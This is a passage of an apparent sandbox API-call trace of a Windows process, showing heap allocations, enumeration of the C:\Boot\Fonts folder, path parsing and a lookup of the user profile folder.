[0183.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.912] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*" (normalized: "c:\\boot\\fonts\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.913] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.913] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0183.913] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0183.913] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0183.913] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0183.913] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0183.913] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0183.913] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.914] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.949] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0183.949] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.949] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.949] PathFindFileNameW (pszPath="") returned="" [0183.949] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.950] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.950] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.950] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.951] 